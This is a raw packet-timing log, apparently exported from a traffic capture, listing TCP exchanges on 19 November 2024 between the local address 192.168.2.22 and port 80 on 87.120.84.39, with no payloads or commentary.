                                                                                                                                  Nov 19, 2024 18:08:04.848031044 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.887821913 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.887842894 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.887856007 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.887866974 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.887877941 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.887900114 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.887919903 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.888025045 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888036013 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888046026 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888055086 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888071060 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888071060 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.888087034 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.888103962 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.888184071 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.888214111 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888223886 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888233900 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888242960 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888253927 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888256073 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.888262987 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888264894 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.888295889 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.888323069 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.888449907 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888461113 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888470888 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888492107 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.888509989 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.888586998 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888597965 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888607979 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888617992 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888628006 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888628006 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.888638020 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.888653040 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.888668060 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.888684988 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888696909 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888706923 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888726950 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.888741970 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.888766050 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888777018 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888786077 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888796091 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888807058 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.888816118 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.888839960 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.888920069 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888928890 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888938904 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888948917 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888958931 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.888958931 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888968945 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.888972998 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888983965 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.888983965 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.888995886 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.889009953 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.889014006 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.889023066 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.889045000 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.902362108 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.906971931 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.906985044 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.906999111 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.907008886 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.907017946 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.907028913 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.907040119 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.907051086 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.907051086 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.907094002 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.907298088 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.907340050 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.907350063 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.907362938 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.907421112 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.907422066 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.907422066 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.907438040 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.907448053 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.907459021 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.907461882 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.907471895 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.907473087 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.907481909 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.907488108 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.907496929 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.907511950 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.907705069 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.907716036 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.907725096 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.907735109 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.907744884 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.907753944 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.907754898 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.907766104 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.907766104 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.907774925 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.907783031 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.907789946 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.907794952 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.907800913 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.907807112 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.907816887 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.907823086 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.907828093 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.907839060 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.907852888 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.907852888 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.907854080 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.907854080 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.907869101 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.907906055 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.907916069 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.907932997 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.907943010 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.907953024 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.907958984 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.907965899 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.907972097 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.907978058 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.907988071 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.908004045 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.908041000 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.908051968 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.908061981 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.908076048 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.908093929 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.908123016 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.908133984 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.908143997 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.908154011 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.908164024 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.908165932 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.908186913 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.908186913 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.908333063 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.908345938 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.908355951 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.908365965 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.908375978 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.908380985 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.908397913 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.908406973 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.908423901 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.908435106 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.908444881 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.908454895 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.908464909 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.908464909 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.908476114 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.908489943 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.926361084 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.926382065 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.926390886 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.926425934 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.926435947 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.926445007 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.926455975 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.926466942 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.926635027 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.926635027 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.926635027 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.926635027 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.926635027 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.926635027 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.938055038 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.938076973 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.938085079 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.938131094 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.938142061 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.938152075 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.938163042 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.938174963 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.938261032 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.938261032 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.938261032 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.938261032 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.938261032 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.938407898 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.938457012 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.938479900 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.938491106 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.938502073 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.938524008 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.938525915 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.938540936 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.938561916 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.938594103 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.938607931 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.938617945 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.938641071 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.938657999 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.938816071 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.938827991 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.938838005 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.938863993 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.938883066 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.938939095 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.938950062 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.938960075 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.938970089 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.938982010 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.938983917 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.938992977 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.939007998 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.939023018 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.978523970 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.978550911 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.978560925 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.978596926 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.978612900 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.978622913 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.978634119 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.978643894 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.978697062 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.978708029 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.978717089 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.978791952 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.978846073 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.978846073 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.978852987 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.978866100 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.978876114 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.978887081 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979099035 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.979099035 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.979192972 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.979223967 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979268074 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.979290962 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979301929 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979325056 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979338884 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979346037 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.979346037 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.979357004 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979358912 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.979368925 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979376078 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.979382038 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979391098 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979392052 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.979402065 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979403973 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.979413986 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.979445934 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.979603052 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979649067 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979649067 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.979660034 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979671955 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979686022 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.979705095 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.979705095 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.979760885 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979770899 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979782104 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979792118 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979801893 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979804039 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.979809046 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979819059 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.979826927 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979834080 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.979837894 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979850054 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.979863882 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.979872942 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.979891062 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.997663021 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.997682095 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.997694969 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.997708082 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.997720957 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.997747898 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.997797966 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.997811079 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.997821093 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.997936964 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.997936964 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.997936964 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.998028994 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.998039961 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.998075962 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.998177052 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.998188972 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.998228073 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.998265028 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.998277903 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.998289108 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.998300076 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.998311996 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.998313904 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.998323917 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.998331070 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.998334885 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.998343945 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.998357058 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.998358011 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.998370886 CET4916180192.168.2.2287.120.84.39
